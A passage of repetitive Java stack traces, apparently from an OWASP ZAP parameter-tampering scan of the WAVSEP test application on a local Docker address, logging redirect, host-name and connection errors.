org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestParameterTamper.scan(TestParameterTamper.java:137) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 5867989 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.ascanrules.TestParameterTamper - Host name may not be null java.lang.IllegalArgumentException: Host name may not be null at org.apache.commons.httpclient.HttpHost.(HttpHost.java:68) at org.apache.commons.httpclient.HttpHost.(HttpHost.java:107) at org.apache.commons.httpclient.HttpMethodBase.setURI(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestParameterTamper.scan(TestParameterTamper.java:137) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 5867990 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.ascanrules.TestParameterTamper - Invalid redirect location: http://| org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://| at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestParameterTamper.scan(TestParameterTamper.java:137) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 5868169 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.ascanrules.TestParameterTamper - Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/| org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/| at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestParameterTamper.scan(TestParameterTamper.java:137) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 5868184 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.ascanrules.TestParameterTamper - Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/| org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/| at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestParameterTamper.scan(TestParameterTamper.java:137) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 5868353 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.ascanrules.TestParameterTamper - Host name may not be null java.lang.IllegalArgumentException: Host name may not be null at org.apache.commons.httpclient.HttpHost.(HttpHost.java:68) at org.apache.commons.httpclient.HttpHost.(HttpHost.java:107) at org.apache.commons.httpclient.HttpMethodBase.setURI(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestParameterTamper.scan(TestParameterTamper.java:137) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 5868355 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.ascanrules.TestParameterTamper - Connection refused java.net.ConnectException: Connection refused at java.net.PlainSocketImpl.socketConnect(Native Method) at java.net.AbstractPlainSocketImpl.doConnect(AbstractPlainSocketImpl.java:339) at java.net.AbstractPlainSocketImpl.connectToAddress(AbstractPlainSocketImpl.java:200) at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:182) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestParameterTamper.scan(TestParameterTamper.java:137) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 5868358 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.ascanrules.TestParameterTamper - java.net.UnknownHostException: at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:178) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestParameterTamper.scan(TestParameterTamper.java:137) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 5868360 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.ascanrules.TestParameterTamper - Host name may not be null java.lang.IllegalArgumentException: Host name may not be null at org.apache.commons.httpclient.HttpHost.(HttpHost.java:68) at org.apache.commons.httpclient.HttpHost.(HttpHost.java:107) at org.apache.commons.httpclient.HttpMethodBase.setURI(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestParameterTamper.scan(TestParameterTamper.java:137) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 5868365 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.ascanrules.TestParameterTamper - Invalid redirect location: http://| org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://| at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestParameterTamper.scan(TestParameterTamper.java:137) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 5868383 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.ascanrules.TestParameterTamper - Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/| org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/| at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestParameterTamper.scan(TestParameterTamper.java:137) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 5868547 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.ascanrules.TestParameterTamper - Host name may not be null java.lang.IllegalArgumentException: Host name may not be null at org.apache.commons.httpclient.HttpHost.(HttpHost.java:68) at org.apache.commons.httpclient.HttpHost.(HttpHost.java:107) at org.apache.commons.httpclient.HttpMethodBase.setURI(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestParameterTamper.scan(TestParameterTamper.java:114) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 5868554 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.ascanrules.TestParameterTamper - http java.net.UnknownHostException: http at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:178) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestParameterTamper.scan(TestParameterTamper.java:114) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 5868747 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.ascanrules.TestParameterTamper - unsupported protocol: 'httk' java.lang.IllegalStateException: unsupported protocol: 'httk' at org.apache.commons.httpclient.protocol.Protocol.lazyRegisterProtocol(Protocol.java:149) at org.apache.commons.httpclient.protocol.Protocol.getProtocol(Protocol.java:117) at org.apache.commons.httpclient.HttpHost.(HttpHost.java:107) at org.apache.commons.httpclient.HttpMethodBase.setURI(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestParameterTamper.scan(TestParameterTamper.java:114) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 5868756 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.ascanrules.TestParameterTamper - Host name may not be null java.lang.IllegalArgumentException: Host name may not be null at org.apache.commons.httpclient.HttpHost.(HttpHost.java:68) at org.apache.commons.httpclient.HttpHost.(HttpHost.java:107) at org.apache.commons.httpclient.HttpMethodBase.setURI(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestParameterTamper.scan(TestParameterTamper.java:137) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 5868757 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.ascanrules.TestParameterTamper - Connection refused java.net.ConnectException: Connection refused at java.net.PlainSocketImpl.socketConnect(Native Method) at java.net.AbstractPlainSocketImpl.doConnect(AbstractPlainSocketImpl.java:339) at java.net.AbstractPlainSocketImpl.connectToAddress(AbstractPlainSocketImpl.java:200) at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:182) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestParameterTamper.scan(TestParameterTamper.java:137) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 5868760 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.ascanrules.TestParameterTamper - java.net.UnknownHostException: at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:178) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at 